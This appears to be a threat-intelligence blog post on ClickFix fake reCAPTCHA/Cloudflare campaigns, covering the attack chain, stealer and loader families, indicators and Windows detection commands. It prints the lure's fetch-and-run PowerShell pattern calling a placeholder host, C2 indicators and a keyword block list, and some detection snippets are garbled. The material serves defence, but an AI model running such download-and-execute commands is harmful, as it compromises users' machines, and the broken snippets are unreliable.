Listen to this Post

Introduction
Threat actors have turned the internet’s most trusted security cues — Google reCAPTCHA and Cloudflare verification badges — into weapons. Since late 2025, sophisticated ClickFix social engineering campaigns have been impersonating these brands with near-perfect fidelity, tricking users into manually executing malicious PowerShell commands that bypass traditional security controls entirely. What makes this attack chain uniquely dangerous is that it doesn’t exploit a software vulnerability; it exploits human trust and the reflexive obedience users have developed toward “verify you’re human” prompts, turning the victim into an unwitting accomplice in their own compromise.
Learning Objectives
- Understand the complete ClickFix attack chain — from fake verification pages to final payload execution — and identify the specific malware families deployed (StealC, HijackLoader, NetSupport RAT, ResiLoader, Amatera, and Remus).
- Learn how to detect, analyze, and block these threats using Sysmon, PowerShell logging, Windows event auditing, and network traffic analysis.
- Master defensive strategies including EDR/AV hardening, Windows attack surface reduction rules, and user awareness training to break the social engineering loop.
You Should Know
- Anatomy of the ClickFix Attack Chain — How a Fake CAPTCHA Leads to Full System Compromise
The attack begins when a user lands on a compromised or maliciously registered domain hosting a page that mimics Google reCAPTCHA, Google Meet prompts, or Cloudflare security checks. These pages are hosted across repurposed domains, compromised legitimate websites, and Cloudflare Pages (.pages.dev) infrastructure. The page displays an instruction — often phrased as “Click here to verify you’re human” or “Press Windows + R, then paste the following command” — and provides a pre-copied PowerShell command.
The command typically follows this pattern:
powershell -c "iex(irm '{IP}:{Port}/{Path}')"
Observed ports in these campaigns include 6600, 9900, 5506, 7895, 7493, 149, and 8442. Some variants use the IClickFix framework to dynamically inject payloads via clipboard injection. Once executed, the PowerShell downloader drops a script named `tmpXXXX.tmp.ps1` in the Temp directory. This script creates C:\ProgramData\Zooms, downloads second-stage payloads from Cloudflare R2 buckets or attacker-controlled IPs, and exfiltrates host data to endpoints such as `http://{IP}/dl-callback`.
Step‑by‑step guide to analyzing this attack chain in a lab environment:
- Set up a Windows 10/11 analysis VM with Sysmon, Process Monitor, and Wireshark installed. Ensure the VM is isolated from your production network.
- Obtain a malicious PowerShell command from a threat intelligence feed or sandbox report. Defang the IP/domain before any testing.
- Execute the command in a monitored environment while capturing network traffic with Wireshark and process creation events with Sysmon.
4. Monitor for the following indicators:
- PowerShell spawning `tmpXXXX.tmp.ps1` from `%TEMP%`
– Creation of `C:\ProgramData\Zooms` directory - Outbound HTTP/HTTPS requests to ports 6600, 9900, 5506, etc.
- Download of ZIP or MSI files from Cloudflare R2 buckets (pattern:
pub-.r2.dev)
- Extract the second-stage payload and submit to VirusTotal or a sandbox for analysis.
- Document the full attack chain including process trees, network connections, and file system changes.
Windows detection command — to hunt for suspicious PowerShell execution patterns, run this in an elevated PowerShell session:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $<em>.Message -match "iex(irm" -or $</em>.Message -match "tmp..ps1" } | Select-Object TimeCreated, Message
Linux detection — for environments where PowerShell is used cross-platform, monitor with:
sudo grep -r "iex(irm" /var/log/ 2>/dev/null sudo journalctl | grep -i "powershell" | grep -E "iex|irm|tmp..ps1"
- The Malware Arsenal — StealC, HijackLoader, NetSupport RAT, and the New ResiLoader
The payload delivery in this campaign is highly modular, distributing malware via MSI installers, ZIP archives, and executable loaders. Each payload serves a distinct purpose in the attacker’s kill chain:
| Payload | Delivery Method | Primary Function |
||-|-|
| StealC | Process hollowing into ServiceModelReg.exe | Info-stealer targeting credentials, cookies, and crypto wallets |
| ResiLoader | Trojanized Electron-based Franz app (libEGL.zip) | .NET NativeAOT DLL that disables AV/EDR via BYOD driver |
| NetSupport RAT | Setup.msi / Invintrum_first.msi | Full remote access and surveillance |
| Amatera Stealer | arworks.zip | Credential and data stealer |
| Remus Stealer | water-1ight.zip | Information stealer |
| Rust Stealer | ibrowser.exe | Lightweight stealer with C2 at popularcard[.]shop |
The most concerning development is ResiLoader, an obfuscated .NET NativeAOT DLL (msys-crypto-3.dll) that uses Bring-Your-Own-Driver (BYOD) techniques with the `pcdhost.sys` driver to disable over 140 AV/EDR processes. It establishes persistence through the RUN registry key and C:\ProgramData\Google Update, performs UAC bypass using the ICMLuaUtil COM interface, and ultimately injects StealC into ServiceModelReg.exe via process hollowing.
Step‑by‑step guide to detecting and blocking these payloads:
- Enable PowerShell script block logging via Group Policy: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell → Turn on PowerShell Script Block Logging.
- Monitor for MSI execution from non-standard locations using Sysmon event ID 7 (Image loaded) and 1 (Process creation):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object { $<em>.Message -match "msiexec" -and $</em>.Message -match "Temp|ProgramData" }
3. Block known malicious hashes at the endpoint:
- ResiLoader: `72907d0ca3258365838626f6a8d993a6`
– StealC: `0234E3188F2883A438B3F2BEAB7A78B2`
– NetSupport RAT: `eee416efcb1e33f220cdb4b05496a07a`
– Remus Stealer: `6a9ac6b3fff7b695dbd4df6ff7f6c516`
– Amatera Stealer: `206ce339febca0c3bcc850f42595fc63`
– Rust Stealer: `b8d53740024d126cb55f83854335a4ab`
4. Deploy Windows Defender Attack Surface Reduction (ASR) rules to block Office apps from creating child processes and block executable content from email and web:Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled Set-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-45E9-8137-84A3D1F3B45A -AttackSurfaceReductionRules_Actions Enabled
- Block the known C2 domains and IPs at the network perimeter (defanged — re-fang only in controlled environments):
– Domains: completstep[.]com, onegeekworld[.]com, antibotv3[.]com, generator-qrcode[.]online, popularcard[.]shop, `xzz[.]proxygrid[.]cc`
– IPs: 151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, 135.181.171[.]40, `146.19.248[.]120`
3. Cloudflare Infrastructure Abuse — R2 Buckets, Pages.dev, and the “Hehe” Response
Attackers have weaponized Cloudflare’s own infrastructure against its users. The campaigns use Cloudflare Pages (.pages.dev) to host obfuscated SECURITY GATEWAY lures and Cloudflare R2 buckets (pub-.r2.dev) for payload hosting. Observed `.pages.dev` subdomains include p-floribunds, pg-altirade2, pg-cordivant-m6, and g-luminence. The infrastructure also features characteristic “hehe” HTTP responses, which can serve as a network detection signature.
Step‑by‑step guide to detecting and mitigating Cloudflare infrastructure abuse:
- Implement network detection rules for `.pages.dev` and `pub-.r2.dev` domains in your proxy or firewall, treating them as高风险 unless explicitly whitelisted for business use.
- Monitor HTTP traffic for the “hehe” response header or body content using a network detection and response (NDR) tool or Suricata:
alert http any any -> any any (msg:"ClickFix hehe response detected"; content:"hehe"; http_server_body; sid:1000001;)
- Deploy DNS sinkholing for known malicious domains and subdomains. Add the following to your DNS blocklist:
– `onegeekworld.com`
– `antibotv3.com`
– `centralwildcats.com`
– `regdev-google.com`
– `generator-qrcode.online`
– `completstep.com`
4. Use Cloudflare’s own threat intelligence — if you are a Cloudflare customer, enable Bot Management and Challenge Passage to block automated and suspicious traffic. - Conduct regular audits of outbound traffic to Cloudflare R2 buckets. Legitimate business use of R2 should be limited and documented; any unexpected `pub-.r2.dev` connections should trigger an alert.
-
User-Assisted Execution — Why Social Engineering Beats Exploits Every Time
This campaign underscores a fundamental shift in the threat landscape: user-assisted execution has become more reliable than exploit-based delivery. By leveraging trusted brands and requiring manual interaction, attackers significantly reduce detection rates while maintaining flexible, multi-payload distribution capabilities. The “approval gate” mechanism in some variants allows real-time selection of payloads, meaning the attacker can choose what to deploy based on the victim’s environment.
Additional lures include fake Google login alerts, QR code generators, and Google Meet “fix audio driver” prompts, with endpoints like `/api/driver-clipboard.php` returning OS-specific payloads.
Step‑by‑step guide to building user resilience:
- Train users to recognize verification page red flags: Legitimate reCAPTCHA and Cloudflare challenges never ask users to open the Run dialog (Windows+R) or Terminal and paste commands.
- Implement a “copy-paste prohibition” policy for sensitive environments: Use endpoint DLP to block clipboard content that contains PowerShell,
iex,irm, or base64-encoded strings from being pasted into Run or Terminal. - Deploy browser extensions that block known phishing domains and display warnings for `.pages.dev` and other free-hosting TLDs.
- Conduct simulated phishing exercises that specifically mimic ClickFix verification pages to test user awareness in a safe environment.
- Establish an easy reporting mechanism — users who encounter suspicious verification pages should have a one-click way to report them to the security team.
-
Advanced Persistence and Evasion — UAC Bypass, BYOD Drivers, and Process Hollowing
The technical sophistication of this campaign is notable. ResiLoader employs multiple advanced evasion techniques:
- BYOD (Bring Your Own Driver): Uses the legitimate `pcdhost.sys` driver to terminate AV/EDR processes, bypassing kernel-mode protections.
- UAC Bypass: Leverages the `ICMLuaUtil` COM interface to elevate privileges without triggering UAC prompts.
- Process Hollowing: Injects StealC into
ServiceModelReg.exe, a legitimate Windows process, to evade process-based detection. - Persistence: Creates a RUN registry key and a folder at `C:\ProgramData\Google Update` to ensure the malware survives reboots.
Step‑by‑step guide to detecting advanced evasion techniques:
- Monitor for unusual driver loads using Sysmon event ID 6 (Driver loaded). Look for `pcdhost.sys` or other unsigned drivers loading from non-standard locations.
- Enable UAC audit logging to detect COM interface abuse:
auditpol /set /subcategory:"User Account Control" /success:enable /failure:enable
- Detect process hollowing by monitoring for `ServiceModelReg.exe` spawning with abnormal command lines or from non-standard paths. Use this Sigma rule (translated to PowerShell for hunting):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object { $<em>.Message -match "ServiceModelReg.exe" -and $</em>.Message -1otmatch "C:\Windows\Microsoft.NET" } - Monitor registry persistence with Sysmon event ID 13 (Registry value set):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=13} | Where-Object { $<em>.Message -match "RUN" -or $</em>.Message -match "Google Update" } - Deploy EDR with behavioral detection — modern EDR solutions should flag process hollowing, UAC bypass, and BYOD driver abuse. Ensure your EDR is configured with these detection rules enabled.
What Undercode Say
- Trust is the new attack vector: This campaign proves that attackers no longer need zero-day exploits. By weaponizing user trust in Google and Cloudflare brands, they achieve the same outcome — full system compromise — with far less effort and far higher success rates.
- Defense requires a human + technical approach: No amount of technical controls can fully protect against an attack that requires the user to manually execute a command. Organizations must pair technical controls (ASR rules, application whitelisting, PowerShell logging) with continuous security awareness training that specifically addresses this new ClickFix threat vector.
- Cloud infrastructure is a double-edged sword: While Cloudflare provides excellent security services, its free-tier offerings (Pages, R2) are being actively abused by threat actors. Security teams must treat `.pages.dev` and `pub-.r2.dev` domains with suspicion and implement granular controls around them.
- The malware ecosystem is highly modular: The use of multiple loaders and stealers in a single campaign indicates a mature, professional operation. Defenders must track not just the final payload but the entire delivery chain, including loaders like ResiLoader that are designed specifically to disable defenses.
- Detection requires deep visibility: Standard antivirus and even next-gen AV are often bypassed by these techniques. Organizations need Sysmon, PowerShell logging, and network traffic analysis to gain the visibility required to detect these attacks in progress.
Prediction
- -1 The ClickFix model will be rapidly adopted by other threat actors and ransomware gangs. Expect to see similar campaigns impersonating Microsoft, Apple, and other major tech brands within the next 3–6 months, with even more convincing lures and expanded payload families.
- -1 ResiLoader and similar BYOD-based loaders will become a standard component in malware toolkits. The technique of using legitimate signed drivers to disable AV/EDR is highly effective and difficult to block without breaking legitimate functionality.
- +1 Increased awareness of ClickFix campaigns will lead to better user training and the development of new browser-based protections. We may see browsers implementing warnings when users attempt to paste PowerShell commands into the Run dialog or terminal from web pages.
- -1 Cloudflare and other CDN providers will face increasing pressure to curb abuse of their free-tier services. However, the scale of their infrastructure makes it difficult to completely prevent malicious use without impacting legitimate users.
- +1 The security community will respond with new detection rules and threat hunting playbooks specifically tailored to ClickFix attacks. Open-source Sigma rules and YARA rules for ResiLoader, StealC, and the associated infrastructure will become widely available, enabling faster detection and response.
- -1 Small and medium-sized businesses without dedicated security teams will remain the most vulnerable. These organizations rarely have the visibility or expertise to detect user-assisted execution attacks, making them prime targets for future ClickFix campaigns.
▶️ Related Video (70% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Divya Kumari – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


